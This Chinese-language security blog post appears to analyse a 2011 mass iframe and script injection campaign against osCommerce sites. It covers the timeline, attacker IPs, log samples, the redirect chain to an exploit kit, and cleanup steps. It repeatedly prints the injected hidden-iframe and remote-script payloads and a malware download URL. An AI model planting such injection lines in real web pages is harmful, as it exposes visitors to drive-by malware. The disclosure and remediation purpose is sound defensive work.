[大綱]
1. 摘要
2. 攻擊時間表
3. 攻擊來源
4. 針對的弱點
5. 受感染網站的症狀
6. 檢測及清除
7. 感染細節
8. 相關截圖
9. 後續補充
[1. 摘要]
1. 感染數量:
在8月3日時,Google 的搜尋結果顯示超過了7,690,000 (willysy) + 629,000 (exero) = 8,300,000 被感染的網頁 (八百多萬個)。 此數量指的是被感染的網頁數量,並不是指網站或網域。
2. 感染的iframe如下:
一開始的型式:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>隨後衍變為:
<script src=http://exero.eu/catalog/jquery.js></script>
3. 攻擊者:
來自烏克蘭的ip: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (都是 AS47694)。Agent 字串: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. 攻擊目標與相應漏洞:
攻擊目標為有使用 osCommerce 的網站,所使用的漏洞: osCommerce Remote Edit Site Info Vulnerability,osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability,及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass。
5. 所插入的惡意連結中會針對以下漏洞攻擊網站瀏覽者:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP
6. 執行攻擊碼的網域:
arhyv.ru,counv.ru
註冊日期: July 20th
註冊者: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 烏克蘭 - Inet Ltd)
相關網域: xlamv.ru,vntum.ru
7. 惡意程式網址:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. 攻擊時間表]
7月10日 -- "Angel Injection" 寫了一篇關於 "osCommerce Remote Edit Site Info Vulnerability" (osCommerce 網站可被遠端編輯資訊之弱點) (這裡,這裡)。
7月11日 -- 攻擊團隊開始測試該項漏洞。
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
7月20日 -- 攻擊者註冊了 arhyv.ru 及 counv.ru 網域,所使用的email: leshkinaira@yahoo.com
7月23日 -- 針對 "Store Name" 這個變數發動攻擊:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
插入的iframe由一開始的:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>爾後演變為:
<script src=http://exero.eu/catalog/jquery.js></script>
7月24日 -- 為我們一開始分析這個事件的時間點,一開始Google顯示只有90,000個網頁被感染:
7月31日 -- Google 顯示 超過 3,410,000 (willysy) + 386,000 (exero) = 3,800,000 (三百多萬) 網頁有遭受感染。
另一方面,Bing 顯示 有 1,800,000 (一百多萬) 個網頁有被 willysy.com 感染:
8月3日 -- Google 顯示超過了 5,820,000 (willysy) + 497,000 (exero) = 6,300,000 (六百多萬) 的網頁有遭受到感染
8月7日 -- Google 顯示超過了 7,690,000 (willysy) + 629,000 (exero) = 8,300,000 (八百多萬) 個網頁遭受感染。
[3. 攻擊來源]
有許多IPs 已經被認定是這次事件的攻擊者: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (這些都屬於 AS47694)。這些IPs 都來自烏克蘭,且屬於ISP: www.didan.com.ua。
攻擊者使用了以下的User-Agent 字串:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
如果你有 log 或者其他攻擊來源可以分享的,請連絡我們。(wayne@armorize.com)
[4. 針對的弱點]
這波攻擊鎖定了使用osCommerce 架設的網站,利用了許多 osCommerce 已知的漏洞,包含: osCommerce Remote Edit Site Info Vulnerability (於 2011/7/10 公開),osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability (於 2011/5/14公開),及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass (於2010/5/30 公開)。
以下為部份 log 樣本:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
[5. 受感染網站的症狀]
1. 網站中 osCommerce 的 "Store Name" 變數會被插入以下一種程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>2. 攻擊者大部份會留下至少一個 (有時候會更多個) 的後門 (或稱之為 "webshells")。這個在 share hosting 網站上更常發生,因為後門程式可以存取在相同機器上,其他網站的資料:
[6. 檢測及清除]
以下為我們建議檢測及清除的流程。如果你有任何疑問或者需要我們幫你檢測,請連絡我們 (wayne@armorize.com)。
1. 檢查是否受到感染。
1.1 搜尋 logs 查看有無以下情形:
1.1.1 來自以下IPs的存取: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214。
1.1.2 透過以下 agent 字串進行存取: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 搜尋你的網站查看有無以下程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
1.3 或者直接透過 HackAlert 幫你進行檢測。
2. 在你用來管理網站的電腦上安裝防毒軟體。
3. 找尋及清除存在的後門。
4. 找尋及清除感染進來的惡意程式碼。
5. 將你的 osCommerce 升到最新版,同時使用 .htaccess 來保護管理者資料夾。
6. 更換相關密碼 (包括你的 hosting 管裡介面及osCommerce中管理員的密碼)
一個很好的文章,教我們如何讓 osCommerce 更安全:(感謝 Markus 提供):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
最新版的 osCommerce 可以在這邊下載:
http://www.oscommerce.com/solutions/downloads
[7. 感染細節]
這部影片錄下整個感染流程,在我們錄的時候,僅有 90,000 的網頁被感染。
而以下是我們新錄製的,此時已經有超過六百萬的網頁被感染:
1. 受感染的網站被插入以下一種惡意程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. 瀏覽器在載入 http://willysy.com/images/banners/ 時,會重導(http 302)到 http://papucky.eu/ext/
3. papucky.eu/ext/ 的內容 在這裡 (pastebin),會去載入 http://gooqlepics.com/include.js?in=864 裡面的 javascript
4. Javascript 在這裡 (pastebin),解開混碼後,會產生一個iframe指向:
http://yandekapi.com/api?in=864
5. http://yandekapi.com/api?in=864 的內容 在這裡,會重導到: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV 的內容 在這裡,解開混碼後,可以看到原始攻擊碼,這個攻擊碼同時攻擊了多個漏洞。
7. 漏洞成功執行後,瀏覽器會下載以下這隻惡意程式並且執行:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. 相關截圖]
具有弱點的 osCommerce 網站允許使用者不需要管理者權限就可以存取及修改變數資訊:
以下為部份被攻擊網站的截圖,請注意title的部份,都有被插入惡意程式碼,這是因為 osCommerce 預設會將 STORE_NAME 這個部份做為 title 來進行顯示 (顯示在title部份的惡意程式碼並不會被執行,因為他被當做是title內容來顯示,值得注意的是,這個STORE_NAME並不是只有用在title部份而已,在其他部份的情況下則會被正確執行):
[9. 後續補充]
截至目前(8月19)為止,除了原本兩種惡意程式碼之外,我們有發現到新的 pattern (透過一樣的漏洞插入的):
原本的:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
持續觀察到的:
<iframe src="http://derryastros.com/images/1/go.php" width="0" height="0" frameborder="0"></iframe>
<script src=http://lamacom.net/images/j/></script>
3 篇回應 :
這是一篇好文章,分析的很詳細.
每次看阿碼的文章,對資安認知有很大的幫助.
謝謝!
可以請教阿瑪:
MONITOR DRIVE的程式,市面上有類似的的可以使用嗎?
因為那個似乎是阿瑪自行開發的.
但是功能很實用,所以想問問看!感謝阿瑪回復搂!
@新晨 那是我自己寫的一隻小程式,錄製 demo 方便,網路上的工具很多,都比較強,可以看這裡:http://technet.microsoft.com/zh-tw/library/dd125466.aspx
張貼留言